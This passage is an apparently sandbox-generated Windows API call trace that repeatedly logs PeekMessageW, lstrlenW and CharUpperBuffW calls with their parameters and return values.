wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.875] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.875] lstrlenW (lpString="20") returned 2 [0081.875] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.875] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.875] lstrlenW (lpString="31") returned 2 [0081.875] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.875] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.875] lstrlenW (lpString="20") returned 2 [0081.875] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.875] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.875] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.875] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.875] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.875] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.875] lstrlenW (lpString="20") returned 2 [0081.876] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.876] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.876] lstrlenW (lpString="33") returned 2 [0081.876] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.876] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.876] lstrlenW (lpString="32") returned 2 [0081.876] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.876] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.876] lstrlenW (lpString="37") returned 2 [0081.876] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.876] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.876] lstrlenW (lpString="37") returned 2 [0081.876] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.876] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.876] lstrlenW (lpString="31") returned 2 [0081.876] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.876] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.876] lstrlenW (lpString="20") returned 2 [0081.876] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.876] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.876] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.876] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.876] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.876] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.876] lstrlenW (lpString="20") returned 2 [0081.876] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.876] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.876] lstrlenW (lpString="32") returned 2 [0081.876] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.877] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.877] lstrlenW (lpString="36") returned 2 [0081.877] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.877] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.877] lstrlenW (lpString="31") returned 2 [0081.877] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.877] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.877] lstrlenW (lpString="31") returned 2 [0081.877] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.877] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.877] lstrlenW (lpString="33") returned 2 [0081.877] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.877] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.877] lstrlenW (lpString="20") returned 2 [0081.877] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.877] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.877] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.877] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.877] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.877] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.877] lstrlenW (lpString="20") returned 2 [0081.877] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.877] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.918] lstrlenW (lpString="30") returned 2 [0081.918] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.918] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.918] lstrlenW (lpString="20") returned 2 [0081.918] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.918] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.918] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.918] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.918] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.918] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.918] lstrlenW (lpString="20") returned 2 [0081.919] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.919] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.919] lstrlenW (lpString="33") returned 2 [0081.919] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.919] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.919] lstrlenW (lpString="20") returned 2 [0081.919] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.919] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.919] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.919] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.919] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.919] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.919] lstrlenW (lpString="20") returned 2 [0081.919] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.919] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.919] lstrlenW (lpString="31") returned 2 [0081.919] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.919] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.919] lstrlenW (lpString="20") returned 2 [0081.919] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.919] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.919] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.919] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.919] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.919] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.919] lstrlenW (lpString="20") returned 2 [0081.919] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.920] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.920] lstrlenW (lpString="31") returned 2 [0081.920] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.920] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.920] lstrlenW (lpString="20") returned 2 [0081.920] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.920] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.920] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.920] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.920] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.920] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.920] lstrlenW (lpString="20") returned 2 [0081.920] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.920] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.920] lstrlenW (lpString="32") returned 2 [0081.920] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.920] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.920] lstrlenW (lpString="35") returned 2 [0081.920] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.920] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.920] lstrlenW (lpString="36") returned 2 [0081.920] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.920] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.920] lstrlenW (lpString="20") returned 2 [0081.920] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.920] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.920] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.920] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.920] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.921] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.921] lstrlenW (lpString="20") returned 2 [0081.921] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.921] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.921] lstrlenW (lpString="38") returned 2 [0081.921] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.921] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.921] lstrlenW (lpString="31") returned 2 [0081.921] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.921] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.921] lstrlenW (lpString="39") returned 2 [0081.921] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.921] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.921] lstrlenW (lpString="32") returned 2 [0081.921] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.921] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.921] lstrlenW (lpString="20") returned 2 [0081.921] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.921] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.921] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.921] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.921] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.921] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.921] lstrlenW (lpString="20") returned 2 [0081.921] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.921] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.921] lstrlenW (lpString="33") returned 2 [0081.921] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.921] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.922] lstrlenW (lpString="32") returned 2 [0081.922] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.922] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.922] lstrlenW (lpString="37") returned 2 [0081.922] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.922] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.922] lstrlenW (lpString="36") returned 2 [0081.922] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.922] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.922] lstrlenW (lpString="38") returned 2 [0081.922] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.922] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.922] lstrlenW (lpString="20") returned 2 [0081.922] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.922] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.922] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.922] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.922] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.922] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.922] lstrlenW (lpString="20") returned 2 [0081.922] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.922] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.922] lstrlenW (lpString="38") returned 2 [0081.922] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.922] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.922] lstrlenW (lpString="20") returned 2 [0081.922] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.922] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.923] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb 